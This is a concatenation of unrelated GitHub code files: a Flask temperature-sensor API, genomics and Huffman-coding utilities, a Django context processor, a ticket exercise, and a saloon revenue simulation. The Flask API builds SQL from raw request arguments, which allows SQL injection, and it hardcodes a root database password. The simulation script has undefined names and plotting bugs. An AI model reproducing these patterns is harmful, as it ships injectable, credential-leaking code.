for details, contact   guy@example.com '\n\n\n@app.route('/temperature', methods=['GET']) # df2 = df[\"Fee\"].mean()\ndef calculate():\n if 'key' in request.args:\n if str(request.args['key']) == apiKey:\n if 'act' in request.args:\n\n if str(request.args['act']) == 'avg':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT * FROM {db_name}\"\n cursor.execute(sql)\n df = pd.read_sql(sql, connection)\n print(df)\n df2 = df[\"temp\"].mean()\n avg_value = str(df2)\n connection.close()\n return f'average value of Temp : {avg_value}'\n \n if str(request.args['act']) == 'min':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select min(temp), time_stamp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT min(temp), time_stamp, humid FROM {db_name}\"\n result = cursor.execute(sql)\n connection.commit()\n r = []\n for row in cursor:\n r.append(row)\n '''\n df = pd.read_sql(sql, connection)\n column = df[\"temp\"]\n index = df['temp'].idxmin()\n min_value = str([index+1, column.min()]) '''\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'max':\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select max(temp), time_stamp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT max(temp), time_stamp, humid FROM {db_name}\"\n \n result = cursor.execute(sql)\n connection.commit()\n r = []\n for row in cursor:\n r.append(row)\n '''\n df = pd.read_sql(sql, connection)\n column = df[\"temp\"]\n timeStamp = df['time_stamp']\n index = df['temp'].idxmax()\n max_value = str([index+1, column.max()]) '''\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'save2file':\n csv_file_path = f'/tmp/temp_data_{time.time()}.csv'\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else: \n sql = f\"SELECT * FROM {db_name}\"\n cursor.execute(sql)\n df = pd.read_sql(sql, connection)\n #print(df)\n #data = '[{x:1, y:1}, {x:5, y:2}, {x:10, y:3}]'\n df.to_csv(csv_file_path, sep=',', encoding='utf-8',index=False) \n file_obj =csv_file_path\n connection.close()\n return send_file(file_obj, mimetype=\"text/csv\", attachment_filename=csv_file_path, )\n \n if str(request.args['act']) == 'count':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n sql = f\"SELECT count(*) FROM {db_name} ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(row)\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'read':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'day' in request.args:\n days = request.args[\"day\"]\n timeStampTo = int(time.time())\n timeStampFrom = int(timeStampTo)-(86413*int(days))\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(timeStampFrom)} and {str(timeStampTo)} ORDER BY ID DESC ;'\n else:\n sql = f\"SELECT * FROM {db_name} ORDER BY ID DESC LIMIT 1 ;\"\n print(sql)\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(f' {row}')\n connection.close() \n return str(r)\n\n if str(request.args['act']) == 'readall':\n r=[]\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'from' in request.args:\n if 'to' in request.args:\n sql = f'select * from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n else:\n return 'Missing TO'\n else:\n sql = f\"SELECT * FROM {db_name} ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n r.append(f'{row} ')\n connection.close()\n return str(r)\n \n if str(request.args['act']) == 'chart':\n timeLine = []\n tData = []\n hData = []\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n if 'day' in request.args:\n days = request.args[\"day\"]\n timeStampTo = int(time.time())\n timeStampFrom = int(timeStampTo)-(86413*int(days))\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(timeStampFrom)} and {str(timeStampTo)}'\n else:\n if 'from' in request.args:\n if 'to' in request.args:\n timeStampFrom =str(request.args[\"from\"])\n timeStampTo = str(request.args[\"to\"])\n sql = f'select time_stamp, temp, humid from {db_name} where time_stamp between {str(request.args[\"from\"])} and {str(request.args[\"to\"])}'\n max_x =str(request.args[\"from\"])\n min_x = str(request.args[\"to\"])\n else:\n return 'Missing [TO]'\n else:\n sql = f\"SELECT temp, time_stamp, humid FROM {db_name} ;\"\n print(sql)\n result = cursor.execute(sql)\n rows = cursor.fetchall()\n for row in rows:\n # add a check, if temp is not bigger or smaller that 25% of AVG, else remove\n timeLine.append(row[\"time_stamp\"])\n tData.append(row['temp'])\n hData.append(row['humid'])\n \n df = pd.read_sql(sql, connection)\n timeStampFrom = int(df['time_stamp'].min())\n timeStampTo = int(df['time_stamp'].max())\n print(f' timeStampFrom => {timeStampFrom}, timeStampTo => {timeStampTo}')\n cold = df['temp'].min()\n hot = df['temp'].max()\n \n sql = f\"SELECT humid, temp FROM {db_name} ORDER BY ID DESC LIMIT 1 ;\"\n result = cursor.execute(sql)\n connection.commit()\n for row in cursor:\n currentHumid = str((row['humid']))\n currentTemp = str((row['temp']))\n connection.close()\n\n return render_template(chart_template, members=timeLine, temp_values=tData, \\\n humid_values=hData, max_x=timeStampTo, min_x=timeStampFrom,\\\n min_y=str(cold), max_y=str(hot), sTime=str(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(timeStampFrom)))), \\\n eTime=time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(timeStampTo))), currentT=str(currentTemp), \\\n currentH=str(currentHumid), currentTime=time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(int(time.time()))))\n \n if str(request.args['act']) == 'write':\n if 'timeStamp' in request.args:\n timeStamp = str(request.args['timeStamp'])\n if 'temp' in request.args:\n temp = str(request.args['temp'])\n if 'humid' in request.args:\n humid = str(request.args['humid'])\n connection = connect(host='172.17.0.3', user='root', password='pass2014', db='temprature', cursorclass=cursors.DictCursor)\n with connection.cursor() as cursor:\n sql = \"INSERT INTO {} (temp, time_stamp, humid) VALUES (\\'{}\\', \\'{}\\', \\'{}\\')\".format(db_name, temp, timeStamp, humid)\n cursor.execute(sql)\n connection.commit()\n connection.close()\n return 'Saved to DB'\n else:\n return 'Missing Action'\n else:\n return 'Missing Key'\n\napp.run(host='0.0.0.0', port=port)\n# app.run(host='0.0.0.0', port='8094')\nc\n","repo_name":"guy111a/ioT_restAPI","sub_path":"tempAPI_2.py","file_name":"tempAPI_2.py","file_ext":"py","file_size_in_byte":13573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27548791116","text":"#!/usr/bin/env python\n\"\"\"\nSome tools save files in BED tabular format but erroneously use 1-based\nindexing, instead of the prescribed 0-based indexing. This tool merely reads\nthe file, subtracts one from the interval start location, and saves to a new\nfile.\n\"\"\"\nimport argparse\n\nimport pybedtools as bt\n\n\ndef is_insertion(ival):\n \"\"\"Determine whether an interval represents an insertion variant.\n\n Parameters\n ----------\n ival : Interval object\n The interval being evaluated.\n\n Returns\n -------\n is_ins : bool\n ``True`` if `ival` represents an insertion.\n\n Notes\n -----\n This function assumes a FAVR formatted file, with variant type noted\n in the 18th column (0-indexed).\n \"\"\"\n is_ins = ival.fields[18].endswith('insertion')\n return is_ins\n\n\ndef start_subtract_one(ival):\n \"\"\"Subtract 1 to the start of an Interval, unless it is an insertion.\n\n Parameters\n ----------\n ival : Interval object\n The interval to be modified.\n\n Returns\n -------\n ival0 : Interval object\n The modified interval.\n \"\"\"\n if not is_insertion(ival):\n ival.start -= 1\n return ival\n\n\ndef favr_to_zero_index(bed):\n \"\"\"Convert a one-based BedTool object to a zero-based one.\n\n Parameters\n ----------\n bed : BedTool object\n The input BED object.\n\n Returns\n -------\n bed0 : BedTool object\n The modified BED object.\n \"\"\"\n bed0 = bed.each(start_subtract_one)\n return bed0\n\n\ndef main():\n \"\"\"Convert FAVR-indexed to BED-indexed files.\n \"\"\"\n parser = argparse.ArgumentParser(\n description='Compute coverage and other stats of BED files.')\n parser.add_argument('bed_files', nargs='+', metavar='BEDFILE',\n help='One or more BED files.')\n parser.add_argument('-s', '--suffix', default='.0.bed',\n help='Append this suffix to mark output filename.')\n args = parser.parse_args()\n for fn in args.bed_files:\n b = bt.BedTool(fn)\n b0 = favr_to_zero_index(b)\n b0.saveas(fn + args.suffix)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"jni/genome-scripts","sub_path":"bedify.py","file_name":"bedify.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4523972754","text":"import json\nclass node:\n def __init__(self, freq, symbol, left = None, right = None):\n # Frequency of symbol\n self.freq = freq\n\n # Symbol itself\n self.symbol = symbol\n\n # left node\n self.left = left\n \n # Right node\n self.right = right\n\n # Tree Direction \n self.huff = ''\n\ndict = {} # Mapping each character to its corresponding huffman codes\nreverseDict = {} # Mapping huffman codes to each corresponding charater\n\n# Recursive function to get huffman codes corresponding to each character\ndef printNodes(node, val = ''):\n newVal = val + str(node.huff)\n\n if node.left is not None:\n printNodes(node.left, newVal)\n\n if node.right is not None:\n printNodes(node.right, newVal)\n\n if node.left is None and node.right is None:\n dict[node.symbol] = newVal\n reverseDict[newVal] = node.symbol\n\n# Encoding the given string to corresponding huffman codes\ndef getEncodedText(originalText):\n encodedText = \"\"\n for i in originalText:\n encodedText = encodedText + dict[i]\n return encodedText\n\n# Adding padding at last so at to make the length of encoded string a multiple of 8\n# Also adding the length of padding aaded in front in 8-bits format only\ndef getPaddedEncodedText(encodedText):\n extra_padding = 8 - len(encodedText) % 8\n for i in range(0, extra_padding):\n encodedText += \"0\"\n padded_info = \"{0:08b}\".format(extra_padding)\n encodedText = padded_info + encodedText\n return encodedText\n\n# Converting each set to 8-bits to its corresponding byte character\ndef getByteArray(paddedEncodedText):\n b = bytearray()\n for i in range(0, len(paddedEncodedText), 8):\n byte = paddedEncodedText[i:i+8]\n b.append(int(byte, 2))\n return b\n\n# Function called by main file providing string data to encode \n# Return decoded string and reverseDict codes\ndef encode(originalText):\n freq = {}\n originalText = originalText.rstrip()\n\n # Grenerating freq map\n for i in originalText:\n freq[i] = 0\n for i in originalText:\n freq[i] = freq[i] + 1\n\n generateHuffmanCodes(freq)\n encodedText = getEncodedText(originalText)\n paddedEncodedText = getPaddedEncodedText(encodedText)\n byteArray = getByteArray(paddedEncodedText)\n\n return reverseDict, byteArray\n\n# Function creating huffman tree and further calling printNodes to create huffman codes map\ndef generateHuffmanCodes(freq):\n nodes = []\n for i in freq:\n nodes.append(node(freq[i], i))\n while len(nodes) > 1:\n nodes = sorted(nodes, key = lambda x:x.freq)\n\n left = nodes[0]\n right = nodes[1]\n\n left.huff = 0\n right.huff = 1\n\n newNode = node(left.freq + right.freq, '#', left, right)\n\n nodes.remove(left)\n nodes.remove(right)\n nodes.append(newNode)\n \n # Huffman Tree is ready\n if(len(nodes) > 0):\n printNodes(nodes[0])\n\n# Function extracting padding length and removing it\ndef remove_padding(padded_encoded_text):\n padded_info = padded_encoded_text[:8]\n extra_padding = int(padded_info, 2)\n padded_encoded_text = padded_encoded_text[8:]\n encoded_text = padded_encoded_text[:-1*extra_padding]\n return encoded_text\n\n# Decoding to the original text from the encoded binar string and reverse mapping\ndef decode_text(encoded_text, reverse_mapping):\n current_code = \"\"\n decoded_text = \"\"\n for bit in encoded_text:\n current_code += bit\n if(current_code in reverse_mapping):\n character = reverse_mapping[current_code]\n decoded_text += character\n current_code = \"\"\n return decoded_text\n\n# Function decoding the encoded byte_string and reverse_mapping to the original text \ndef decode(byte_string, reverse_mapping):\n # Converting the byte string to the corresponding binary string\n bit_string = \"\"\n for byte in byte_string:\n bits = bin(byte)[2:].rjust(8, '0')\n bit_string += bits\n encoded_text = remove_padding(bit_string)\n decompressed_text = decode_text(encoded_text, reverse_mapping)\n return decompressed_text\n\n \n\n","repo_name":"coder-saab001/Optimised-Notepad","sub_path":"HuffmanCoding.py","file_name":"HuffmanCoding.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"5725033450","text":"from django.urls import reverse\nfrom django.conf import settings\nfrom app.models import CartItem\nfrom app.views import _get_cart_key\nfrom custom.helpers import is_member_of_admins, return_insights_script\nimport logging\n\nlogger = logging.getLogger()\n\ndef context(request):\n claims = request.identity_context_data._id_token_claims\n exclude_claims = ['iat', 'exp', 'nbf', 'uti', 'aio', 'rh']\n claims_to_display = {claim: value for claim,\n value in claims.items() if claim not in exclude_claims}\n\n logger.debug(f\"function: context, claims_to_display: {claims_to_display}\")\n\n if 'oid' in claims_to_display:\n is_admin = is_member_of_admins(\n claims_to_display['oid'], settings.AZURE_CONFIG.azure_aad_b2c_tenant)\n else:\n is_admin = False\n\n client_id = settings.AAD_CONFIG.client.client_id\n aad_link = \"https://portal.azure.com/#blade/Microsoft_AAD_RegisteredApps/ApplicationMenuBlade/Authentication/appId/\" + client_id + \"/isMSAApp/\"\n\n item_count = 0\n try:\n cart_items = CartItem.objects.filter(cart_key=_get_cart_key(request))\n if cart_items:\n for cart_item in cart_items:\n item_count += cart_item.quantity\n except CartItem.DoesNotExist:\n item_count = 0\n\n script = return_insights_script(settings.AZURE_CONFIG.azure_insights.instrumentation_key)\n\n return dict(is_admin=is_admin, item_count=item_count, claims_to_display=claims_to_display,\n redirect_uri_external_link=request.build_absolute_uri(\n reverse(settings.AAD_CONFIG.django.auth_endpoints.redirect)),\n aad_link=aad_link, insights_script=script)\n","repo_name":"awku/relativity-azure-project","sub_path":"webapp/project/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1894016325","text":"command = input()\r\n\r\nstudent_tickets = 0\r\nstandard_tickets = 0\r\nkids_tickets = 0\r\ncombine_tickets = 0\r\ntickets_sold = 0\r\ncinema_is_full = False\r\n\r\nwhile command != 'Finish':\r\n movie_name = command\r\n free_seats = int(input())\r\n total_seats = free_seats\r\n for movie in range(free_seats):\r\n ticket_type = input()\r\n if total_seats < 0 or ticket_type == 'End':\r\n cinema_is_full = True\r\n break\r\n if ticket_type == 'student':\r\n student_tickets += 1\r\n elif ticket_type == 'standard':\r\n standard_tickets += 1\r\n elif ticket_type == 'kid':\r\n kids_tickets += 1\r\n total_seats -= 1\r\n tickets_sold += 1\r\n combine_tickets = student_tickets + standard_tickets + kids_tickets\r\n hall_percentage = tickets_sold / free_seats * 100\r\n print(f\"{movie_name} - {hall_percentage:.2f}% full.\")\r\n tickets_sold = 0\r\n command = input()\r\nkids = kids_tickets / combine_tickets * 100\r\nstandard = standard_tickets / combine_tickets * 100\r\nstudent = student_tickets / combine_tickets * 100\r\nprint(f\"Total tickets: {combine_tickets}\")\r\nprint(f\"{student:.2f}% student tickets.\")\r\nprint(f\"{standard:.2f}% standard tickets.\")\r\nprint(f\"{kids:.2f}% kids tickets.\")\r\n","repo_name":"LazChu/SoftUni-projects","sub_path":"Programming Basics with Python/exams/exam 6-7 april/cinema_tickets.py","file_name":"cinema_tickets.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1195840273","text":"import numpy as np\nfrom random import shuffle, seed\nfrom time import perf_counter\n\n# Convenience funtion to get the upcoming event\ndef get_next_event(events_list):\n event_times = [x[0] for x in events_list]\n t = min(event_times)\n return event_times.index(t)\n\n\ndef model(\n time_horizon,\n bartenders, # Each bartender is represented as a list containing T/F (Female/Male)\n customer_lambda, # mins\n p_drink,\n serve_time, # mins\n flirt_time, # mins\n drink_time, # mins\n drink_price, # $\n avg_tip, # $\n patience_threshold, # mins\n pmin_queue_shootout,\n p_queue_shootout,\n p_pianist_killed,\n pianist_net_worth, # $\n shootout_loss, # $\n poker_table_size, # people\n poker_length, # mins\n p_leave,\n p_lost_everything,\n p_jackpot, # This is cumulative, including p_lost_everything\n):\n bartenders_in_simulation = [[bartender, 0] for bartender in bartenders]\n # Each bartender is represented as a list containing T/F (Female/Male) and\n # a numeric variable indicating the time when the next action is finished\n\n sheriff_entry = np.random.uniform() * time_horizon\n events = [(np.random.exponential(customer_lambda), 'Customer_choice', 'new'),\n (sheriff_entry, 'Sheriff_entry'), (sheriff_entry + 60, 'Sheriff_exit'),\n (240, 'Lambda_down')]\n revenue = 0\n customer_count = 0\n poker_table = 0\n event_history = []\n clock = (0, 'start')\n sheriff_present = False\n\n # The event loop\n while clock[0] < time_horizon:\n\n # Check event type\n if clock[1] == 'Customer_choice':\n # Does he stay in the saloon?\n if (clock[2] == 'existing') & (np.random.uniform() < p_leave):\n customer_count -= 1\n else:\n if clock[2] == 'new':\n # Increase guest count\n customer_count += 1\n # Generate next customer\n events.append((clock[0] + np.random.exponential(customer_lambda),\n 'Customer_choice', 'new'))\n # Choose action\n if poker_table < poker_table_size:\n if np.random.uniform() < p_drink:\n events.append((clock[0], 'Customer_drinks'))\n else:\n poker_table += 1\n if poker_table == poker_table_size:\n events.append((clock[0] + poker_length, 'Poker_finish'))\n else:\n events.append((clock[0], 'Customer_drinks'))\n\n if clock[1] == 'Customer_drinks':\n waiting_time = np.inf\n shuffle(bartenders_in_simulation) # works inplace\n for x in bartenders_in_simulation:\n if x[1] <= clock[0]:\n # A free bartender available, customer is served\n # Potentially check whether an if or random number generation is faster here\n duration = x[0] * flirt_time * np.random.uniform() + serve_time\n x[1] = clock[0] + duration\n revenue += drink_price + np.random.gamma(shape=5, scale=avg_tip / 5) * x[0]\n events.append((clock[0] + duration + np.random.exponential(drink_time),\n 'Customer_choice', 'existing'))\n waiting_time = False\n break\n else:\n waiting_time = min(waiting_time, x[1])\n # Can we handle waiting within the same loop without creating an extra iteration?\n\n # If no bartender, wait at the bar\n if waiting_time:\n # Calculate cumulative waiting time\n try:\n time_in_queue = clock[2] + waiting_time - clock[0]\n except IndexError:\n time_in_queue = waiting_time - clock[0]\n # Determine if client gets nervous\n if time_in_queue > patience_threshold:\n if np.random.uniform() < max(pmin_queue_shootout, clock[0] / 600 * p_queue_shootout):\n events.append((clock[0] + patience_threshold, 'Shootout'))\n else:\n events.append((waiting_time, 'Customer_drinks', time_in_queue))\n\n elif clock[1] == 'Sheriff_entry':\n sheriff_present = True\n\n elif clock[1] == 'Sheriff_exit':\n sheriff_present = False\n\n elif clock[1] == 'Shootout':\n if not sheriff_present:\n event_history.append(clock)\n revenue -= shootout_loss * max(1, np.log(clock[0]) / np.log(420)) + (\n np.random.uniform() < p_pianist_killed) * pianist_net_worth\n return revenue, event_history\n # Decide on scenario handling here\n\n elif clock[1] == 'Poker_finish':\n outcome = np.random.uniform()\n if outcome < p_lost_everything:\n # The loser starts a shootout\n events.append((clock[0], 'Shootout'))\n elif outcome < p_jackpot:\n # The winner buys everybody a round\n revenue += customer_count * drink_price\n # Some players stay, some leave, some grab a drink\n poker_table = np.random.randint(poker_table_size)\n leavers = np.random.binomial(poker_table_size - poker_table, p_leave)\n customer_count -= leavers\n if (poker_table_size - poker_table - leavers) > 0:\n events.append(\n (clock[0], 'Customer_drinks') * (poker_table_size - poker_table - leavers))\n \n elif clock[1] == 'Lambda_down':\n customer_lambda -= 5 # Avg time between new customers 5 mins shorter\n\n event_history.append(clock)\n # Get next event\n clock = events.pop(get_next_event(events))\n\n return revenue, event_history\n\n\ndef run_simulation(\n n_simulations,\n time_horizon=10 * 60,\n bartenders=(False, True),\n customer_lambda=25,\n p_drink=0.9,\n serve_time=5,\n flirt_time=15,\n drink_time=35,\n drink_price=2,\n avg_tip=1,\n patience_threshold=15,\n pmin_queue_shootout=0.03,\n p_queue_shootout=0.06,\n p_pianist_killed=0.05,\n pianist_net_worth=450,\n shootout_loss=200,\n poker_table_size=5,\n poker_length=10,\n p_leave=0.1,\n p_lost_everything=0.02,\n p_jackpot=0.04,\n):\n revenues = np.zeros(n_simulations)\n event_histories = []\n for simulation_number in range(n_simulations):\n result, history = \\\n model(\n time_horizon=time_horizon,\n bartenders=bartenders,\n customer_lambda=customer_lambda,\n p_drink=p_drink,\n serve_time=serve_time,\n flirt_time=flirt_time,\n drink_time=drink_time,\n drink_price=drink_price,\n avg_tip=avg_tip,\n patience_threshold=patience_threshold,\n pmin_queue_shootout=pmin_queue_shootout,\n p_queue_shootout=p_queue_shootout,\n p_pianist_killed=p_pianist_killed,\n pianist_net_worth=pianist_net_worth,\n shootout_loss=shootout_loss,\n poker_table_size=poker_table_size,\n poker_length=poker_length,\n p_leave=p_leave,\n p_lost_everything=p_lost_everything,\n p_jackpot=p_jackpot,\n )\n revenues[simulation_number] = result\n event_histories.append(history)\n\n return revenues, event_histories\n\n\n# ## Scenariusz bazowy\n# In[]:\n\nresults_normal, _ = run_simulation(n_simulations=1000)\n\n# In[]:\n\nplot_saving_mode = True\n\n# In[]:\n\n\nprint(\"średni dochód: \" + str(results_normal.mean()))\nprint(\"odchylenie z dochodu: \" + str(results_normal.std()))\n\n\n# In[]:\n\n\nplt.figure(figsize = (8, 4))\nplt.hist(results_normal, bins=100, density = True, color = 'blue')\nplt.ylabel(\"Częstość\")\nplt.xlabel(\"Przychód [$]\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/histogram.pdf')\nelse:\n plt.show()\n\n\n# ## Liczba zatrudnionych barmanów\n# In[]:\n\n\ndef find_opt_solution(max_male, max_female, params = {'n_simulations': 200}):\n bartender_results = np.zeros((max_male+1, max_female+1))\n \n for i in tqdm.tqdm( product( np.arange(max_male+1), np.arange(max_female+1) ) ):\n # creating unique combination of male and female bartenders\n params['bartenders'] = [False] * i[0] + [True] * i[1]\n #running simulation\n results, _ = run_simulation(**params)\n #appending results\n bartender_results[i] = results.mean()\n \n path_matrix = np.zeros((max_male + 1, max_female + 1))\n optimum = 0\n diags = [bartender_results[::-1,:].diagonal(i) for i in range(1-bartender_results.shape[0], bartender_results.shape[1])]\n \n for i, x in enumerate(diags):\n i0 = min(i, path_matrix.shape[0]-1) - x.argmax()\n i1 = i-i0\n path_matrix[i0, i1] = x.max() - optimum\n optimum = x.max()\n return bartender_results, path_matrix\n\n# In[]:\n\nbartender_results, path_matrix = find_opt_solution(10, 10, {'n_simulations': 1000})\n\n# In[]:\n\n\nplt.figure(figsize = (8, 5))\nsns.heatmap(bartender_results)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/barmani.pdf')\nelse:\n plt.show()\n\n# In[]:\n\n\nplt.figure(figsize = (8,5))\nsns.set(style = 'whitegrid')\nsns.heatmap(path_matrix, cmap = 'seismic_r', center = 0)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/opt_sciezka.pdf')\nelse:\n plt.show()\n\n# ## Strategia cenowa\n# In[]:\n\n\nresults_expensive, _ = run_simulation(n_simulations=n_simulations, drink_price=4, patience_threshold=10)\nresults_cheap, _ = run_simulation(n_simulations=n_simulations)\nresults_super_cheap, _ = run_simulation(\n n_simulations=n_simulations,\n drink_price=1,\n patience_threshold=20,\n customer_lambda=10)\n\n\n# In[]:\n\n\nprint(\"średnia:\")\nprint(\"droższe drinki: \" + str(results_expensive.mean()))\nprint(\"tańsze drinki: \" + str(results_cheap.mean()))\nprint(\"super tanie drinki: \" + str(results_super_cheap.mean()))\n\nprint(\"\\nodchylenie:\")\nprint(\"droższe drinki: \" + str(results_expensive.std()))\nprint(\"tańsze drinki: \" + str(results_cheap.std()))\nprint(\"super tanie drinki: \" + str(results_super_cheap.std()))\n\n\n# In[]:\n\n\nplt.figure(figsize=(8, 4))\ndf_to_plot = pd.DataFrame(\n {\n \"Strategia cenowa salonu\": \n [\"normalne ceny\"] * n_simulations + \n [\"niskie ceny\"] * n_simulations + \n [\"wysokie ceny\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_cheap, results_super_cheap, results_expensive), axis=0)\n }\n)\nax = sns.barplot(x=\"Strategia cenowa salonu\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/drinki.pdf')\nelse:\n plt.show()\n\n\n# # Więlkosc stolow do pokera\n# In[]:\n\n\nresults_normal, _ = run_simulation(n_simulations=n_simulations)\nresults_1, _ = run_simulation(n_simulations=n_simulations, poker_table_size=6, poker_length=15)\nresults_2, _ = run_simulation(n_simulations=n_simulations, poker_table_size=7, poker_length=20)\nresults_3, _ = run_simulation(n_simulations=n_simulations, poker_table_size=8, poker_length=25)\n\n\n# In[]:\n\n\nplt.figure(figsize=(8,4))\ndf_to_plot = pd.DataFrame(\n {\n \"Stół do pokera\": \n [\"na 5 graczy\"] * n_simulations + [\"na 6 graczy\"] * n_simulations + [\"na 7 graczy\"] * n_simulations + [\"na 8 graczy\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_normal, results_1, results_2, results_3), axis=0)\n }\n)\nsns.barplot(x=\"Stół do pokera\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/poker.pdf')\nelse:\n plt.show()\n\n\n# In[]:\n\n\nprint(\"średni przychód normal: \" + str(results_normal.mean()))\nprint(\"średni przychód 1: \" + str(results_1.mean()))\nprint(\"średni przychód 2: \" + str(results_2.mean()))\nprint(\"średni przychód 3: \" + str(results_3.mean()))\n\nprint(\"odchylenie normal: \" + str(results_normal.std()))\nprint(\"odchylenie przychód 1: \" + str(results_1.std()))\nprint(\"odchylenie przychód 2: \" + str(results_2.std()))\nprint(\"odchylenie przychód 3: \" + str(results_3.std()))\n\n\n\n\n\n\n\n\n# # Analiza wrażliwości\n\n# ## Zatrudnianie ładniejszych kelnerek\n\n# In[]:\n\nn_simulations = 1000\nbartenders_opt = [True, True, True]\n\n# In[]:\n\nresults_normal, _ = run_simulation(n_simulations=n_simulations,\n bartenders = bartenders_opt)\nresults_beautiful, _ = run_simulation(n_simulations=n_simulations,\n bartenders = bartenders_opt,\n flirt_time=25,\n avg_tip=5)\n\n\n# In[]:\n\nplt.figure(figsize=(8,4))\ndf_to_plot = pd.DataFrame(\n {\n \"Personel\": \n [\"ładny\"] * n_simulations + [\"ładniejszy\"] * n_simulations,\n \"Przychód [$]\": np.concatenate((results_normal, results_beautiful), axis=0)\n }\n)\nax = sns.barplot(x=\"Personel\", y=\"Przychód [$]\", data=df_to_plot, ci=\"sd\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/personel.pdf')\nelse:\n plt.show()\n\n\n# In[]:\n\n\nprint(\"średni przychód ładna: \" + str(results_normal.mean()))\nprint(\"średni przychód ładniejsza: \" + str(results_beautiful.mean()))\n\nprint(\"odchylenie ładna: \" + str(results_normal.std()))\nprint(\"odchylenie ładniejsza: \" + str(results_beautiful.std()))\n\n# In[ ]:\n\nbartender_results_pretty, path_matrix_pretty = find_opt_solution(10, 10, {'n_simulations': n_simulations,\n 'flirt_time':25, 'avg_tip':5})\n\n\n# In[ ]:\n\nplt.figure(figsize = (8, 5))\nsns.heatmap(bartender_results)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/barmani_ladni.pdf')\nelse:\n plt.show()\n\n# In[ ]:\n\nplt.figure(figsize = (8,5))\nsns.heatmap(path_matrix, cmap = 'seismic_r', center = 0)\nplt.ylabel(\"Liczba zatrudnionych barmanów płci męskiej\")\nplt.xlabel(\"Liczba zatrudnionych barmanów płci żeńskiej\")\nif plot_saving_mode:\n plt.savefig('raport/wykresy/opt_sciezka_ladni.pdf')\nelse:\n plt.show()\n\n# ## Próg cierpliwosci klientow\n# In[]:\n\n\npatience_results = np.zeros(11)\npatience_std = np.zeros(11)\n\nfor patience in tqdm.tqdm(range(len(patience_results))):\n results, _ = run_simulation(n_simulations=int(n_simulations), patience_threshold=patience)\n patience_results[patience] = results.mean()\n patience_std[patience] = results.std()\n\n\n# In[]:\n\n\nplt.figure(figsize = (8,4))\nplt.fill_between(np.arange(0, 11), y1 = patience_results - patience_std,\n y2 = patience_results + patience_std,\n alpha = 0.3)\nplt.plot(patience_results)\nplt.hlines(y = 0, xmin = 0, xmax = 10, 